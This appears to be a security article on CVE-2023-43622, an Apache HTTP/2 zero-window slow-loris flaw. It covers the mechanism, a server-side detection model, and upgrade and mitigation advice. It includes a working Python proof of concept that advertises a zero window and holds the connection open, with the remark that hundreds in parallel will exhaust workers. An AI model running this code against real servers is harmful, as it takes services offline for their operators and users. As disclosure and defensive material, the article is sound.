In September 2023, a new vulnerability was discovered in Apache HTTP Server affecting versions 2.4.55 to 2.4.57. Identified as CVE-2023-43622, this bug lets attackers freeze server connections with a technique similar to the classic "slow loris" attack—but now upgraded for the HTTP/2 era. In this article, we'll break down how the bug works, show you an example exploit, explain the fix, and help you secure your servers.
What’s the Vulnerability?
In simple terms:
If an attacker opens an HTTP/2 connection but sets the initial window size to 0, they can stop any data frames from being sent or received. Apache’s worker process will sit there waiting—potentially forever—using up a server thread until the connection finally times out.
With enough of these connections, an attacker can saturate all your server's available workers, making your website slow or unavailable. It's the modern equivalent of "slow loris," where many slow clients tie up all your server resources.
Applies to:
- Apache HTTP Server versions 2.4.55, 2.4.56, and 2.4.57
- Only if HTTP/2 (mod_http2) is enabled
Fixed in:
- Apache HTTP Server 2.4.58
How Does It Work?
In HTTP/2, the client and the server exchange control frames that manage how much data can be sent at once (the "window size"). If a client sets its window size to zero, it is effectively saying, "Don't send me anything, I'll let you know when I'm ready." If the client never increases the window size, the connection is stuck.
Apache before 2.4.58 does not properly close these idle connections, leaving them open until the configured Timeout is reached—and with enough of them, all workers are blocked.
Exploit Example
Let’s see what this looks like in the wild. Here’s a basic Python example using the hyper-h2 library to open connections with a zero window size.
WARNING: This is for educational use only. Do NOT use it against servers you do not own.
import socket
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.settings import SettingCodes

SERVER = 'your-apache-server.com'
PORT = 443

sock = socket.create_connection((SERVER, PORT))
# If using TLS, wrap the socket here as needed

config = H2Configuration(client_side=True, header_encoding='utf-8')
conn = H2Connection(config=config)
conn.initiate_connection()

# Advertise an initial window size of 0 in a SETTINGS frame. Assigning to
# conn.local_settings after initiate_connection() does not emit a frame, so
# update_settings() is what actually puts the new value on the wire.
conn.update_settings({SettingCodes.INITIAL_WINDOW_SIZE: 0})
sock.sendall(conn.data_to_send())

# Send headers (HTTP GET)
headers = [
    (':method', 'GET'),
    (':path', '/'),
    (':scheme', 'https'),
    (':authority', SERVER),
]
conn.send_headers(1, headers, end_stream=True)
sock.sendall(conn.data_to_send())

# Now just keep this connection open and do nothing.
input("Press Enter to close connection...")
sock.close()
Open dozens or hundreds of these connections in parallel, and your Apache HTTP/2 worker threads will start to saturate—making the service unresponsive.
Upgrade Apache!
The straightforward solution:
Upgrade to Apache HTTP Server 2.4.58 or later.
Download:
https://httpd.apache.org/download.cgi
What changed?
Starting with 2.4.58, Apache recognizes these "zero window" connections and will drop them as soon as they hit the configured connection timeout, instead of waiting forever.
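To see the flow-control mechanism from the "How Does It Work?" section from the server's side, and the rule the 2.4.58 fix applies to it, here is an added example written for this article (my own code, not Apache's and not the author's). It parses the HTTP/2 frames involved (SETTINGS, HEADERS, WINDOW_UPDATE), models the per-stream windows one client grants, and flags the connection for closing once it has been stuck at a zero window for the configured Timeout. It assumes one watcher per connection and leaves out the connection-level window on stream 0, which the bug does not need; the exchange in simulate() is constructed.

```python
import struct

# HTTP/2 frame types, the SETTINGS identifier involved and its default (RFC 7540, 6.5.2 and 6.9)
HEADERS, SETTINGS, WINDOW_UPDATE, INITIAL_WINDOW_SIZE, DEFAULT_WINDOW = 0x1, 0x4, 0x8, 0x4, 65535

def frame(ftype, payload, stream_id=0, flags=0):
    # 9-byte frame header: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id, then payload
    return len(payload).to_bytes(3, "big") + bytes([ftype, flags]) + struct.pack("!I", stream_id) + payload

def parse_frames(buf):
    # Yield (type, flags, stream_id, payload); a trailing partial frame is left for the next read
    while len(buf) >= 9 and len(buf) >= 9 + (n := int.from_bytes(buf[:3], "big")):
        yield buf[3], buf[4], struct.unpack("!I", buf[5:9])[0] & 0x7FFFFFFF, buf[9:9 + n]
        buf = buf[9 + n:]

class ZeroWindowWatch:
    # Server-side model of the per-stream send windows one client grants us, plus a stall timer
    def __init__(self):
        self.initial = DEFAULT_WINDOW  # peer's SETTINGS_INITIAL_WINDOW_SIZE
        self.streams = {}              # stream id -> bytes of DATA we may still send on it
        self.stalled_since = None      # first moment at which no open stream could take DATA
    def feed(self, data, now):
        for ftype, flags, sid, payload in parse_frames(data):
            if ftype == HEADERS:
                self.streams.setdefault(sid, self.initial)
            elif ftype == SETTINGS and not flags & 0x1:  # a SETTINGS ACK carries no values
                for off in range(0, len(payload), 6):
                    ident, value = struct.unpack("!HI", payload[off:off + 6])
                    if ident == INITIAL_WINDOW_SIZE:
                        # RFC 7540 6.9.2: a changed initial size shifts every open stream's window
                        self.streams = {s: w + value - self.initial for s, w in self.streams.items()}
                        self.initial = value
            elif ftype == WINDOW_UPDATE and sid in self.streams:
                self.streams[sid] += struct.unpack("!I", payload)[0] & 0x7FFFFFFF
        stalled = any(w == 0 for w in self.streams.values())  # an open request that can take no DATA
        self.stalled_since = None if not stalled else (now if self.stalled_since is None else self.stalled_since)

    def should_drop(self, now, timeout):
        # What 2.4.58 does: close a stalled zero-window connection once Timeout has elapsed
        return self.stalled_since is not None and now - self.stalled_since >= timeout

def simulate(timeout=60):
    # Constructed exchange: zero-window SETTINGS, a GET on stream 1, silence, then a WINDOW_UPDATE
    zero = frame(SETTINGS, struct.pack("!HI", INITIAL_WINDOW_SIZE, 0))
    get = frame(HEADERS, b"", stream_id=1, flags=0x5)  # END_HEADERS|END_STREAM, header block elided
    w = ZeroWindowWatch()
    w.feed(zero + get, now=0)
    early, late = w.should_drop(timeout - 1, timeout), w.should_drop(timeout, timeout)  # inside / at Timeout
    w.feed(frame(WINDOW_UPDATE, struct.pack("!I", 1024), stream_id=1), now=timeout)
    return early, late, w.should_drop(timeout + 5, timeout)  # (False, True, False)
```

A client that opens many such connections is exactly what the watcher is meant to catch; a real server would key one watcher per connection and run should_drop() from its timeout loop.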
If you cannot upgrade right away
- Reduce the Timeout setting to a lower value in your Apache config, so idle connections are closed sooner (be sure this won't impact legitimate users).
- Limit the number of HTTP/2 workers/processes to minimize damage.
- Consider using a reverse proxy (like nginx or HAProxy) in front of Apache to filter out slow connections.
References
- Apache security advisory for CVE-2023-43622
- CVE entry on Mitre
- HTTP/2 RFC 7540, Section 6.9: Flow Control
- Original Apache httpd changelog
Conclusion
Even mature, widely used software like Apache can be tripped up by subtle protocol behavior, especially as attackers adapt classic techniques for new technologies.
If you run Apache with HTTP/2, update ASAP to 2.4.58 or higher to get protection against this attack!
If you want to stay secure, keep an eye on security lists, update your software regularly, and consider running network monitoring tools that alert you to suspicious connection patterns.
Stay safe and patch your servers!
Timeline
Published on: 10/23/2023 07:15:11 UTC
Last modified on: 11/01/2023 18:11:02 UTC